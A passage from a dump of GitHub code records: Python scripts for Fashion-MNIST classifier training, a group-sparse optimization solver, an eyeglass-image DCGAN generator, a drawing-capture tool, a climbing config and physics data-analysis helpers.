c incorporating signs of a,b,c :\"))\nquadratic(equation)\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"piyush-daigavhane/ERC-ECS-Python-Question","sub_path":"question_2.py","file_name":"question_2.py","file_ext":"py","file_size_in_byte":445,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"13456796861","text":"import os\nimport requests\nimport zipfile\nimport cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport sys\nfrom nnObjs import *\n\ndef loadMNISTDataset(path):\n\n labels = os.listdir(path)\n X = []\n y = []\n print(\"Loading images...\")\n\n numFiles = 0\n for label in labels:\n files = os.listdir(path + \"/\" + label)\n numFiles += len(files)\n\n cumNum = 1\n for label in labels:\n files = os.listdir(path + \"/\" + label)\n for file in files:\n print(f\"Loading file {file} in label {label} in {path} PROGRESS: %{100*cumNum/numFiles:.3f}\")\n image = cv2.imread(path + \"/\" + label + \"/\" + file, cv2.IMREAD_UNCHANGED)\n X.append(image)\n y.append(label)\n cumNum += 1\n\n return np.array(X), np.array(y).astype(\"uint8\")\n\nURL = 'https://nnfs.io/datasets/fashion_mnist_images.zip'\nFILE = 'fashion_mnist_images.zip'\nFOLDER = \"fashionMNISTImages\"\n\n\n# prepare data\nif not os.path.isfile(FILE):\n\n print(f'Downloading {URL} and saving as {FILE}...')\n \n r = requests.get(URL)\n with open(FILE, \"wb\") as zipFile:\n zipFile.write(r.content)\n\nif not os.path.isdir(FOLDER):\n print(f'Unzipping to folder {FOLDER}...')\n\n with zipfile.ZipFile(FILE) as zipFile:\n zipFile.extractall(FOLDER)\n\n# display example data\nimageData = cv2.imread(FOLDER + \"/train/4/0011.png\", cv2.IMREAD_UNCHANGED)\nnp.set_printoptions(linewidth=200)\nplt. imshow (imageData, cmap=\"gray\")\nplt. show (block=False)\nplt. pause (3)\nplt. close ()\n\n#load train and test data\nX, y = loadMNISTDataset ( FOLDER + \"/train\" )\nXTest, yTest = loadMNISTDataset ( FOLDER + \"/test\" )\n\n#scale image data (0, 255) to (-1, 1)\nX = (X .astype(np.float32) - 255/2) / (255/2)\nXTest = (XTest.astype(np.float32) - 255/2) / (255/2)\n\n#reshape\nX = X. reshape(X. shape[0], -1)\nXTest = XTest. reshape(XTest. 
shape[0], -1)\nX = np.transpose(X)\nXTest = np.transpose(XTest)\n\n#shuffle\nindexes = np.array(range(X.shape[1]))\nnp.random.shuffle(indexes)\nX = X[:, indexes]\ny = y[indexes]\n\n# create model\nmodel1 = model()\n\nmodel1.addLayer(layerDense(64, X.shape[0]))\nmodel1.addLayer(actReLu())\nmodel1.addLayer(layerDense(64, 64))\nmodel1.addLayer(actReLu())\nmodel1.addLayer(layerDense(10, 64))\nmodel1.addLayer(actSoftmax())\n\nmodel1.set(loss=lossCatCrossEnt(),\n optimizer=optimizerAdam(decay=5e-5),\n accuracy=accuracyCategorical()\n )\n\nmodel1.establish()\n\nmodel1.train(X, y, numEpoch=5, batchSize=128, printEvery=100)\n\nmodel1.validate(XVal=XTest, yVal=yTest, batchSize=128)\n\nmodel1.plotEpoch()\n\nparams = model1.getParams()\n\nmodel1.saveParams(\"fashionMNIST.params\")\n\nmodel1.saveModel(\"fashionMNIST.model\")\n\n# CREATE NEW MODEL FROM TRAINED MODEL PARAMETERS\nmodel2 = model()\n\nmodel2.addLayer(layerDense(64, X.shape[0]))\nmodel2.addLayer(actReLu())\nmodel2.addLayer(layerDense(64, 64))\nmodel2.addLayer(actReLu())\nmodel2.addLayer(layerDense(10, 64))\nmodel2.addLayer(actSoftmax())\n\nmodel2.set(loss=lossCatCrossEnt(), accuracy=accuracyCategorical())\n\nmodel2.establish()\n\nmodel2.loadParams(\"fashionMNIST.params\")\n\nmodel2.validate(XTest, yTest)\n\n# LOAD SAVED MODEL\nmodel3 = model.load(\"fashionMNIST.model\")\n\nmodel3.validate(XTest, yTest)\n\nconfidences = model3.predict(XTest, batchSize=2500)\npredictions = model3.outputLayerActivation.prediction(confidences)\n\n\n# USE MODEL3\nmodel3 = model.load(\"fashionMNIST.model\")\n\nfashionMNISTLabels = {\n 0: 'T-shirt/top',\n 1: 'Trouser',\n 2: 'Pullover',\n 3: 'Dress',\n 4: 'Coat',\n 5: 'Sandal',\n 6: 'Shirt',\n 7: 'Sneaker',\n 8: 'Bag',\n 9: 'Ankle boot'\n }\n\nimageData = cv2.imread(FOLDER + \"/test/4/0011.png\", cv2.IMREAD_GRAYSCALE)\nplt.figure()\nplt.imshow(imageData, cmap=\"gray\")\n\n#imageData = 255 - imageData\n#plt.figure()\n#plt.imshow(imageData, cmap=\"gray\")\n\nimageData = cv2.resize(imageData, (28, 28))\nplt.figure()\nplt.imshow(imageData, cmap=\"gray\")\n\nimageData = (imageData.astype(np.float32) - 255/2) / (255/2)\nimageData = imageData.reshape(1, -1)\nimageData = np.transpose(imageData)\n\n\nconfidences = model3.predict(imageData)\npredictions = model3.outputLayerActivation.prediction(confidences)\n\n#print(predictions)\n#print(predictions.shape)\n#print(predictions[0, 0])\n\nprediction = fashionMNISTLabels[predictions[0, 0]]\n\nprint(prediction)\n\nplt.show()","repo_name":"omerozy/appMLP","sub_path":"fashionMINST.py","file_name":"fashionMINST.py","file_ext":"py","file_size_in_byte":4653,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
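The scaling step above maps raw pixels from [0, 255] to [-1, 1] by centering on 255/2, and the reshape/transpose lays out one flattened sample per column. A minimal self-contained check of that transform on dummy images (shapes assumed to match Fashion-MNIST's 28x28):

import numpy as np

# fake batch: one all-black and one all-white 28x28 image
batch = np.stack([np.zeros((28, 28)), np.full((28, 28), 255)])

scaled = (batch.astype(np.float32) - 255/2) / (255/2)
print(scaled.min(), scaled.max())  # -1.0 1.0

# flatten each image, then transpose so each column is one sample
flat = np.transpose(scaled.reshape(scaled.shape[0], -1))
print(flat.shape)  # (784, 2)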
+{"seq_id":"42673717978","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n# How much previous days count\nDECAY = 0.8\n\n# How much success in a higher grade counts for lower grades\n# and how much failure in lower grades counts for higher grades\nOTHER_GRADE_WEIGHT = 0.5\n\n# How much a partially completed route counts\nPARTIAL_ROUTE_WEIGHT = 0.5\n\n# Should we translate color names to English?\nENGLISH = False\n\n","repo_name":"samhocevar/climbing","sub_path":"src/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":380,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"20397359916","text":"'''\nFile: solve.py\nAuthor: Yutong Dai (rothdyt@gmail.com)\nFile Created: 2020-02-23 10:51\nLast Modified: 2021-01-28 00:05\n--------------------------------------------\nDescription:\n'''\nimport sys\nimport os\nimport time\nimport numpy as np\nsys.path.append(\"../\")\nsys.path.append(\"../..\")\n\nimport src.solvers.FaRSAGroup.utils as utils\nfrom src.solvers.FaRSAGroup.params import *\nfrom src.solvers.FaRSAGroup.Algorithm import AlgoBase, set_prox_stepsize\nimport src.solvers.FaRSAGroup.printUtils as printUtils\n\n\ndef solve(f, r, X_initial=None, proxStepsize=None, method='gradient',\n update_proxStepsize='const', params=params, print_group=True, print_second_level=False,\n kappa_1=1e-2, kappa_2=1e-2, fraction=0.8, print_time=False, cg_backtrack_strategy=\"cutfrac\"):\n \"\"\"\n Solve the group l2 regualrized problem.\n\n Args:\n f: loss function object\n r: regularizer object\n X_intial(np.array): starting point\n proxStepsize(np.float64/np.array/None): \n If it is set to None, then one should call `set_prox_stepsize` to initialize the proxStepsize\n method: parameters for `set_prox_stepsize`.\n update_proxStepsize:\n 'const': use constant params['zeta']\n 'single': use only one proxStpesize for all groups; estimated by Lipschtiz constant\n 'block': each group has its own proxStepsize; at each iteration, working groups are updated with the same Lipschtiz constant estimation\n 'group': each group has its own proxStepsize; at each iteration, proxStepsize for each working groups are updated separately\n 'groupv': varinat of group and only allows to decrease proxstepsize\n update_kappa:\n 'chicg': update min(kappa, 1/2) as chicg suggests\n 'hack': update kappa as hack suggests\n params:\n a dictionary containing parameters for linesearch methods.\n force_cg: force one to try newton step with the unit stepsize\n \"\"\"\n # print out some key parameters\n if update_proxStepsize in ('single', 'const'):\n alpha_type = 'singlealpha'\n else:\n alpha_type = 'groupalpha'\n if proxStepsize is None:\n # proxStepsize = set_prox_stepsize(f, r, alpha_type, method)\n proxStepsize = np.min([set_prox_stepsize(f, r, alpha_type, method), 1])\n print('proxStepsize is [None]; Set up by {}'.format(method))\n else:\n print('proxStepsize is [{}]'.format(type(proxStepsize)))\n print(\"Update proxStepsize using {}\".format(update_proxStepsize))\n print(\"Print time per iteration: {}\".format(print_time))\n print(\"Termination tol:cg:{} | pg:{}\".format(\n params['tol_cg'], params['tol_pg']))\n print(\"maxtime:{} | maxiter:{}\".format(\n params['max_time'], params['max_iter']))\n print(\n f\"kappa1_max:{params['kappa1_max']:3.3e} | kappa2_max:{params['kappa2_max']:3.3e}\")\n print(\n f\"kappa1_min:{params['kappa1_min']:3.3e} | kappa2_min:{params['kappa2_min']:3.3e}\")\n print(\n f\"kappa_increase:{params['kappa_increase']} | kappa_decrease:{params['kappa_decrease']}\")\n print(f\"kappaStrategy: dynamic | count freq:{params['kappa_freq_count']}\")\n print(f\"Equipped with early termination\")\n # set up algorithms\n Ndata = f.n\n p = f.p\n K = r.K\n G_i_starts = r.starts\n G_i_ends = r.ends\n unique_groups = r.unique_groups\n problem_attribute = f.__str__()\n problem_attribute += \"Regularizer:{:.>44}\\n\".format(r.__str__())\n problem_attribute += \"Penalty Parameter:{:.>30}lambda={:3.4f}\\n\".format(\n '', r.penalty)\n problem_attribute += \"Number of groups:{:.>32}\\n\".format(K)\n problem_attribute += \"Update proxStepsize:{:.>35}\\n\".format(\n update_proxStepsize)\n algo = 
AlgoBase(f, r, proxStepsize, params, kappa_1, kappa_2)\n iteration_start = time.time()\n if X_initial is None:\n X = np.zeros([p, 1])\n else:\n X = X_initial\n fevals = gevals = HvProds = subitsT = 0\n info = {}\n if params['save_log']:\n outID = '{}'.format(params['tag'])\n else:\n outID = f.datasetName\n time_so_far = print_cost = 0\n if params['printlevel'] >= 1:\n utils.print_problem(problem_attribute, outID)\n # normX = utils.l2_norm(X)\n normX = np.sqrt(np.dot(X.T, X))[0][0]\n algo.fval = algo.f.evaluate_function_value(X)\n rval = algo.r.func(X)\n algo.F = algo.fval + rval\n fevals += 1\n gevals += 1\n iteration = 0\n time_update_proxStepszie = 0\n if Ndata < p:\n print('n=p, no fraction')\n prox_time = 0\n newton_time = 0\n pg_ls_time = 0\n cg_ls_time = 0\n pg_time = 0\n cg_time = 0\n consequtive_pg = 0\n fraction_init = fraction # remember the starting fraction for the switch below\n F_seq_switch = [np.inf, -np.inf] # last two F values at cg iterations (initial values assumed)\n if params[\"kappa_freq_count\"]:\n kappa_increase, kappa_decrease = 0, 0\n kappa_1_max, kappa_1_min = kappa_1, kappa_1\n kappa_2_max, kappa_2_min = kappa_2, kappa_2\n\n while True:\n # print('=============================')\n # print(\"Iteration:{}\".format(iteration))\n # if iteration == 9:\n # print(1)\n prox_time_iter = time.time()\n algo.proximal_step(X)\n # print(\"||s||:{}\".format(utils.l2_norm(algo.proximal)))\n prox_time_iter = time.time() - prox_time_iter\n prox_time += prox_time_iter\n # call set_cg first because of internal dependence issues.\n algo.set_cg()\n algo.set_pg()\n # print(f\"kappa_1:{algo.kappa_1:2.3e} | kappa_2:{algo.kappa_2:2.3e}\")\n gI_cg, nI_cg, gI_pg, nI_pg = len(algo.I_cg_group), np.sum(\n algo.I_cg_index), algo.K - len(algo.I_cg_group), np.sum(algo.I_pg_index)\n # if iteration in [95, 96]: # debug madelon to remove\n # # print(\"Iter:{} | old: {} | new: {}\".format(iteration, chicg_last_iteration, algo.chi_cg))\n # print(iteration)\n # print(utils.get_classification(algo.zeroGroup, algo.nonzeroGroup, algo.zeroProxGroup, algo.nonzeroProxGroup))\n iteration_end = time.time() - iteration_start - print_cost\n time_so_far += iteration_end\n\n if params['printlevel'] == 2:\n if iteration % params['printevery'] == 0:\n # utils.print_header(outID, print_time)\n printUtils.print_header(outID, print_time)\n res = utils.get_classification(\n algo.zeroGroup, algo.nonZeroGroup, algo.zeroProxGroup, algo.nonZeroProxGroup)\n nn, nz, zn, zz = len(\n res['NZ-NZ']), len(res['NZ-Z']), len(res['Z-NZ']), len(res['Z-Z'])\n # utils.print_iteration(iteration, algo.fval, normX, algo.F, algo.proxStepsize, algo.chi_cg, algo.chi_pg,\n # gI_cg, nI_cg, gI_pg, nI_pg, nn, nz, zn, zz, outID)\n printUtils.print_iteration(iteration, algo.fval, normX, algo.F, algo.proxStepsize, algo.kappa_1, algo.chi_cg, algo.chi_pg,\n gI_cg, nI_cg, gI_pg, nI_pg, nn, nz, zn, zz, outID)\n if iteration == 0:\n chi_cg_0 = algo.chi_cg\n chi_pg_0 = algo.chi_pg\n chi_cg_termination = params['tol_cg'] * max(1, chi_cg_0)\n chi_pg_termination = params['tol_pg'] * max(1, chi_pg_0)\n if (algo.chi_cg <= chi_cg_termination) and (algo.chi_pg <= chi_pg_termination):\n info['status'] = 0\n break\n if iteration >= params['max_iter']:\n info['status'] = 1\n break\n if time_so_far > params['max_time']:\n info['status'] = 2\n break\n iteration_start = time.time()\n\n if algo.chi_pg <= params['Gamma'] * algo.chi_cg:\n # choose the working groups\n cg_time_iter = time.time()\n if Ndata < p:\n algo.select_cg_frac(fraction)\n else:\n algo.select_cg()\n y = algo.cg_step(X, cg_backtrack_strategy)\n cg_time_iter = time.time() - cg_time_iter\n cg_time += cg_time_iter\n cg_ls_time += algo.ls_time_iter\n newton_time += 
algo.newton_time_iter\n HvProds += algo.subits\n fevals += algo.cg_feval\n if algo.status in [-1, 4]:\n info['status'] = algo.status\n if algo.status == -1:\n print(\"maxback cg:\", algo.cg_backtrack)\n utils.print_cg_step(algo.typeofIteration, algo.nI_cgs, algo.gradF_Icgs_norm, algo.subprobFlag, algo.subits,\n algo.res, algo.res_target, algo.normd, algo.cg_type, algo.newZB, algo.dirder,\n algo.projection_attempts, algo.cg_backtrack, algo.cg_stepsize,\n prox_time_iter, algo.newton_time_iter, algo.ls_time_iter, cg_time_iter,\n outID, print_time)\n break\n else:\n pg_time_iter = time.time()\n algo.select_pg()\n y = algo.pg_step(X)\n pg_time_iter = time.time() - pg_time_iter\n pg_time += pg_time_iter\n pg_ls_time += algo.ls_time_iter\n fevals += algo.pg_feval\n if algo.pg_flag == False:\n if update_proxStepsize == 'const':\n algo.proxStepsize *= algo.params['zeta']\n if algo.status == -1:\n info['status'] = algo.status\n print(\"maxback pg:\", algo.pg_backtrack)\n utils.print_pg_step(algo.typeofIteration, algo.nI_pgs, algo.subits, algo.normd,\n algo.pg_backtrack, algo.pg_stepsize,\n prox_time_iter, algo.ls_time_iter, pg_time_iter,\n outID, print_time)\n break\n if update_proxStepsize != 'const':\n time_update_proxStepszie_begin = time.time()\n if algo.typeofIteration == 'cg':\n algo.get_proxStepsize(\n X, y, algo.f_old, algo.fval, algo.d_use, algo.stepSize_use)\n else:\n algo.get_proxStepsize(\n X, y, algo.f_old, algo.fval, algo.d_use, algo.stepSize_use)\n algo.proxStepsize = algo.newProxStepsize\n time_update_proxStepszie_end = time.time()\n time_update_proxStepszie += time_update_proxStepszie_end - \\\n time_update_proxStepszie_begin\n\n subitsT += algo.subits\n temp = time.time()\n if params['printlevel'] == 2:\n if algo.typeofIteration == 'cg':\n utils.print_cg_step(algo.typeofIteration, algo.nI_cgs, algo.gradF_Icgs_norm, algo.subprobFlag, algo.subits,\n algo.res, algo.res_target, algo.normd, algo.cg_type, algo.newZB, algo.dirder,\n algo.projection_attempts, algo.cg_backtrack, algo.cg_stepsize,\n prox_time_iter, algo.newton_time_iter, algo.ls_time_iter, cg_time_iter,\n outID, print_time)\n else:\n utils.print_pg_step(algo.typeofIteration, algo.nI_pgs, algo.subits, algo.normd,\n algo.pg_backtrack, algo.pg_stepsize,\n prox_time_iter, algo.ls_time_iter, pg_time_iter,\n outID, print_time)\n if print_second_level:\n if len(algo.bar_I_cg_group) != 0:\n utils.print_more(algo.bar_I_cg_index, algo.bar_I_cg_group, algo.bar_chi_cg, algo.I_cg_index, algo.chi_cg,\n algo.norm_gradF_bar_I_cg, algo.group_X_norm, algo.group_gradF_norm,\n algo.small_radius_lst, algo.outter_radius_lst, algo.inner_radius_lst,\n algo.kappa_1, algo.kappa_2, algo.kappa_3, outID)\n else:\n utils.print_empty_bar_Icg(outID)\n print_cost = time.time() - temp\n X = y\n # this is need if update_proxStepsize is not const or single\n # algo.fval = algo.f.evaluate_function_value(X)\n # algo.F = algo.fval + algo.r.evaluate_function_value(X)\n # normX = utils.l2_norm(X)\n normX = np.sqrt(np.dot(X.T, X))[0][0]\n gevals += 1 # about to call gradient method in the next iteration\n iteration += 1\n if Ndata < p:\n if (iteration % 5 == 1) and (algo.typeofIteration == 'cg'):\n F_seq_switch.pop(0)\n F_seq_switch.append(algo.F)\n if np.abs(F_seq_switch[0] - F_seq_switch[1]) <= 1e-3:\n fraction = 1\n else:\n fraction = fraction_init\n if algo.typeofIteration == 'cg':\n consequtive_pg = 0\n # 6 - 1 = 5 total backtracks\n if algo.cg_backtrack + algo.projection_attempts > 6:\n # default: 1e3 make 10 also controlable # factor to increase and decrease 
(10, 1/10)\n algo.kappa_1 = min(\n algo.kappa_1 * params['kappa_increase'], params['kappa1_max'])\n algo.kappa_2 = min(\n algo.kappa_2 * params['kappa_increase'], params['kappa2_max'])\n if params[\"kappa_freq_count\"]:\n kappa_increase += 1\n kappa_1_max = max(algo.kappa_1, kappa_1_max)\n kappa_2_max = max(algo.kappa_2, kappa_2_max)\n else:\n consequtive_pg += 1\n if consequtive_pg > 5:\n # default: 1e-5\n algo.kappa_1 = max(\n algo.kappa_1 * params['kappa_decrease'], params['kappa1_min'])\n algo.kappa_2 = max(\n algo.kappa_2 * params['kappa_decrease'], params['kappa2_min'])\n if params[\"kappa_freq_count\"]:\n kappa_decrease += 1\n kappa_1_min = min(kappa_1_min, algo.kappa_1)\n kappa_2_min = min(kappa_2_min, algo.kappa_2)\n\n if params['printlevel'] == 2:\n utils.print_exit(info['status'], outID)\n nnz = utils.get_group_structure(\n X, K, unique_groups, G_i_starts, G_i_ends, epsilon=1e-8)\n info['n'] = algo.f.n\n info['p'] = algo.f.p\n info['Lambda'] = algo.r.penalty\n info['num_groups'] = algo.r.K\n info['nnz'] = nnz\n info['nz'] = algo.K - nnz\n info['F'] = algo.F\n info['normX'] = normX\n info['f'] = algo.fval\n info['chipg'] = algo.chi_pg\n info['chicg'] = algo.chi_cg\n info['fevals'] = fevals\n info['HvProds'] = HvProds\n info['time'] = time_so_far\n info['iteration'] = iteration\n info['num_pg_steps'] = algo.num_pg_steps\n info['num_cg0_stpes'] = algo.num_cg0_steps\n info['num_cgdesc_steps'] = algo.num_cgdesc_steps\n info['gevals'] = gevals\n info['subits'] = subitsT\n info['time_update_stepsize'] = time_update_proxStepszie\n info['X'] = X\n info['zeroGroup'] = algo.zeroGroup\n info['nonZeroGroup'] = algo.nonZeroGroup\n info['proxStepsize'] = algo.proxStepsize\n info['cg_time'] = cg_time\n info['newton_time'] = newton_time\n info['cg_ls_time'] = cg_ls_time\n info['pg_time'] = pg_time\n info['pg_ls_time'] = pg_ls_time\n info['prox_time'] = prox_time\n if params[\"kappa_freq_count\"]:\n info['kappa_increase'] = kappa_increase\n info['kappa_decrease'] = kappa_decrease\n info['kappa1_max'] = kappa_1_max\n info['kappa2_max'] = kappa_2_max\n info['kappa1_min'] = kappa_1_min\n info['kappa2_min'] = kappa_2_min\n if params['printlevel'] == 2 and info['status'] != -1 and print_group:\n utils.print_group_sparsity(\n X, K, unique_groups, G_i_starts, G_i_ends, outID, epsilon=1e-8)\n if params['printlevel'] == 2:\n utils.print_result(info, outID)\n return info\n","repo_name":"Yutong-Dai/S-PStorm","sub_path":"src/solvers/FaRSAGroup/solve.py","file_name":"solve.py","file_ext":"py","file_size_in_byte":15871,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
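The main loop above terminates on scaled optimality measures: each tolerance is taken relative to the initial chi value via tol * max(1, chi_0), so well-scaled problems use the absolute tolerance while badly-scaled ones get a proportional one. The same test in isolation (a standalone sketch; tolerance defaults assumed):

def converged(chi_cg, chi_pg, chi_cg_0, chi_pg_0, tol_cg=1e-6, tol_pg=1e-6):
    # tolerances scale with the initial optimality measures,
    # but never drop below the absolute tolerance (max with 1)
    return (chi_cg <= tol_cg * max(1, chi_cg_0)) and (chi_pg <= tol_pg * max(1, chi_pg_0))

print(converged(5e-7, 2e-7, chi_cg_0=0.3, chi_pg_0=0.8))    # True
print(converged(5e-4, 2e-7, chi_cg_0=100.0, chi_pg_0=0.8))  # False: 5e-4 > 1e-6 * 100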
+{"seq_id":"30833876600","text":"import numpy as np\nimport tensorflow as tf\nimport os\nfrom PIL import Image\n\nfrom networks import dcgan_utils\n\n\ndef build_model():\n \"\"\"\n Builds the generator part of the eye-glass generating DCGAN model.\n\n :return: the built generator model as tf.keras Sequential object (not compiled yet)\n \"\"\"\n inp = tf.keras.layers.InputLayer((25,)) # input layer\n fc = tf.keras.layers.Dense(7040) # fully connected layer\n reshape = tf.keras.layers.Reshape(target_shape=(4, 11, 160)) # reshape tensor\n # \"deconvolutional\" layers\n deconv1 = tf.keras.layers.Conv2DTranspose(80, (5, 5), strides=(2, 2), padding='same')\n deconv2 = tf.keras.layers.Conv2DTranspose(40, (5, 5), strides=(2, 2), padding='same')\n deconv3 = tf.keras.layers.Conv2DTranspose(20, (5, 5), strides=(2, 2), padding='same')\n deconv4 = tf.keras.layers.Conv2DTranspose(3, (5, 5), strides=(2, 2), padding='same', activation='tanh')\n\n model = tf.keras.models.Sequential(\n [\n inp,\n fc,\n tf.keras.layers.BatchNormalization(),\n tf.keras.layers.ReLU(),\n reshape,\n deconv1,\n tf.keras.layers.BatchNormalization(),\n tf.keras.layers.ReLU(),\n deconv2,\n tf.keras.layers.BatchNormalization(),\n tf.keras.layers.ReLU(),\n deconv3,\n tf.keras.layers.BatchNormalization(),\n tf.keras.layers.ReLU(),\n deconv4\n ],\n name='Generator'\n )\n\n model.summary()\n\n return model\n\n\n# NOTE: start fresh training instead\n@DeprecationWarning\ndef load_gen_weights(gmodel):\n from deprecated import model_importer\n npas = model_importer.load_dcgan_mat_model_weights('../matlab-models/gen.mat')\n gmodel.layers[0].set_weights([npas[0], dcgan_utils.get_xavier_initialization((7040,))])\n gmodel.layers[4].set_weights([np.reshape(npas[3], (5, 5, 80, 160)), dcgan_utils.get_xavier_initialization((80,))])\n gmodel.layers[7].set_weights([np.reshape(npas[6], (5, 5, 40, 80)), dcgan_utils.get_xavier_initialization((40,))])\n gmodel.layers[10].set_weights([np.reshape(npas[9], (5, 5, 20, 40)), dcgan_utils.get_xavier_initialization((20,))])\n gmodel.layers[13].set_weights([np.reshape(npas[12], (5, 5, 3, 20)), dcgan_utils.get_xavier_initialization((3,))])\n\n return gmodel\n\n\ndef scale_gen_output(prediction):\n \"\"\"\n Scales the values of a NumPy array with original range [-1, 1] to range [0, 255].\n\n :param prediction: a numpy array with values ranging between -1 and 1\n :return: a numpy array with integer values between 0 and 255\n \"\"\"\n prediction += 1 # shift to range [0, 2]\n prediction *= 127.5 # scale to range [0, 255]\n prediction = np.round(prediction, 0)\n prediction = prediction.astype(int)\n\n return prediction\n\n\ndef save_gen_output_to_file(matrix):\n print(f'Saving image matrix of size {np.shape(matrix)}')\n matrix = np.asarray(matrix, dtype=np.uint8)\n img = Image.fromarray(matrix, 'RGB')\n\n # img.show()\n if not os.path.exists('../../out'):\n os.makedirs('../../out')\n img.save('../../out/generated_glass.png', 'PNG')\n","repo_name":"PhilK-7/agns-port","sub_path":"agns-py/src/networks/eyeglass_generator.py","file_name":"eyeglass_generator.py","file_ext":"py","file_size_in_byte":3142,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"14444199013","text":"from PIL import ImageTk, Image, ImageDraw\nimport PIL\nfrom tkinter import *\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n\nclass DoodleInput():\n def __init__(self) -> None:\n width = 300 # canvas width\n height = 300 # canvas height\n center = height//2\n white = (255, 255, 255) # canvas back\n\n self.drawing_coords = []\n\n master = Tk()\n\n # create a tkinter canvas to draw on\n self.canvas = Canvas(master, width=width, height=height, bg='white')\n self.canvas.pack()\n\n # create an empty PIL image and draw object to draw on\n self.output_image = PIL.Image.new(\"RGB\", (width, height), white)\n self.draw = ImageDraw.Draw(self.output_image)\n self.canvas.pack(expand=YES, fill=BOTH)\n self.canvas.bind(\"\", self.paint)\n\n # add a button to save the image\n button=Button(text=\"save\",command=self.save)\n button.pack()\n\n master.mainloop()\n\n def save(self):\n coords = np.asarray(self.drawing_coords.copy())\n coords[:,1] = -coords[:,1] + 300\n np.savetxt('draw_coords.csv', coords, delimiter=\",\")\n self.plot(coords)\n # self.output_image.save(filename)\n\n def paint(self, event):\n x1, y1 = (event.x - 1), (event.y - 1)\n x2, y2 = (event.x + 1), (event.y + 1)\n self.drawing_coords.append((x1, y2))\n self.canvas.create_oval(x1, y1, x2, y2, fill=\"black\",width=5)\n self.draw.line([x1, y1, x2, y2],fill=\"black\",width=5)\n\n def plot(self, coords):\n plt.plot(coords[:,0], coords[:,1])\n plt.show()\n\n\nif __name__ == \"__main__\":\n di = DoodleInput()","repo_name":"edbatk/RobotSystems","sub_path":"ArmPi/Week 8/doodleInput.py","file_name":"doodleInput.py","file_ext":"py","file_size_in_byte":1657,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"25721962054","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib.animation import FuncAnimation\nfrom IPython.display import display\nimport math\n\npd.options.mode.chained_assignment = None\n\n##################################\n# FUNCOES #\n##################################\n\n \ndef integrate(x, y, y0 = 0):\n yi = [y0]\n \n for i in range(1, min(len(x), len(y))):\n dy = ((y[i-1] + y[i]) / 2) * (x[i] - x[i-1])\n yi.append(yi[i-1] + dy)\n \n return yi\n\ndef derivate(x, y, y0 = 0):\n '''\n array, array, object -> array\n \n Recebe dois vetores com dados e retorna um vetor de mesmo tamanho, que seria o resultado da derivada de y em x.\n y0 é o valor inicial da derivada.\n '''\n yi = [y0]\n \n for i in range(1, min(len(x), len(y))):\n dy = y[i] - y[i-1]\n dx = x[i] - x[i-1]\n if dx == 0:\n yi.append(dy)\n else:\n yi.append(dy / dx)\n \n return yi\n\ndef frange(start, stop, step=1.0):\n \n i = start\n while i < stop:\n yield i\n i += step\n \ndef erro(df, dft1, dft2, x):\n e1 = []\n e2 = []\n \n for i in range(len(df)):\n j = math.floor(df['time'][i] * 1000)\n e1.append(df[x][i] - dft1[x][j])\n e2.append(df[x][i] - dft2[x][j])\n \n df[x + '_e1'] = e1\n df[x + '_e2'] = e2\n \ndef plot_experimentos(df, x, labels = '', units = '', exp = ''):\n h = len(x)\n fig, plots = plt.subplots(h, 5, sharex = 'col', sharey = 'row')\n fig.set_figwidth(20)\n fig.set_figheight(4 * h)\n fig.subplots_adjust(hspace = 0.05, wspace = 0, top = 0.93)\n fig.suptitle('Valores experimentais para os experimentos de ' + exp)\n fig.set_facecolor('#FFFFFF')\n for i in range(5):\n j = 0\n plots[j, i].scatter(df[i]['time'], df[i][x[j]], s = 1 if h == 3 else 10)\n plots[j, i].set_title('Experimento ' + str(i+1))\n \n if h == 3:\n j += 1\n plots[j, i].scatter(df[i]['time'], df[i][x[j]], s = 1)\n \n j += 1 \n plots[j, i].scatter(df[i]['time'], df[i][x[j]], s = 1 if h == 3 else 10)\n plots[j, i].set_xlabel('Tempo (s)')\n \n j = 0\n plots[j, 0].set_ylabel(labels[j] + ' (' + units[j] + ')')\n \n if h == 3:\n j += 1\n plots[j, 0].set_ylabel(labels[j] + ' (' + units[j] + ')')\n \n j += 1\n plots[j, 0].set_ylabel(labels[j] + ' (' + units[j] + ')')\n \n plt.show()\n \ndef plot_modelos(df, dft1, dft2, x, labels = '', units = '', exp = ''):\n def plot_modelo(plots, df, dft, x, i = 0, m = 1):\n i *= 2\n m -= 1\n plots[i, m].scatter(df['time'], df[x], s = 1)\n plots[i, m].plot(dft['time'], dft[x], color = 'C1')\n plots[i, m].set_xticklabels([])\n \n i += 1\n plots[i, m].set_xlabel('Tempo (s)')\n plots[i, m].scatter(df['time'], df[x + '_e' + str(m+1)], s = 1)\n plots[i, m].plot([0, max(df['time'])], [0, 0], '--', color = 'C1')\n \n h = len(x)\n \n fig, plots = plt.subplots(2 * h, 2, sharey = 'row')\n fig.set_figwidth(10)\n fig.set_figheight(8 * h)\n fig.subplots_adjust(wspace = 0, top = 0.93)\n fig.suptitle('Comparação dos resultados do método de Euler com o método\\nde Euler-Richardson para os experimentos de ' + exp)\n fig.set_facecolor('#FFFFFF')\n \n plots[0, 0].set_title('Método de Euler')\n plots[0, 1].set_title('Método de Euler-Richardson')\n for i in range(h):\n plot_modelo(plots, df, dft1, x[i], i = i, m = 1)\n plot_modelo(plots, df, dft2, x[i], i = i, m = 2)\n plots[2*i, 0].set_ylabel(labels[i] + ' (' + units[i] + ')')\n plots[2*i+1, 0].set_ylabel('Erro de ' + labels[i] + ' (' + units[i] + ')')\n \n \n \n\n##################################\n# DADOS #\n##################################\n#\n## 'CHUTE' = valores que esquecemos (Vitor, principalmente) de coletar, então estão 
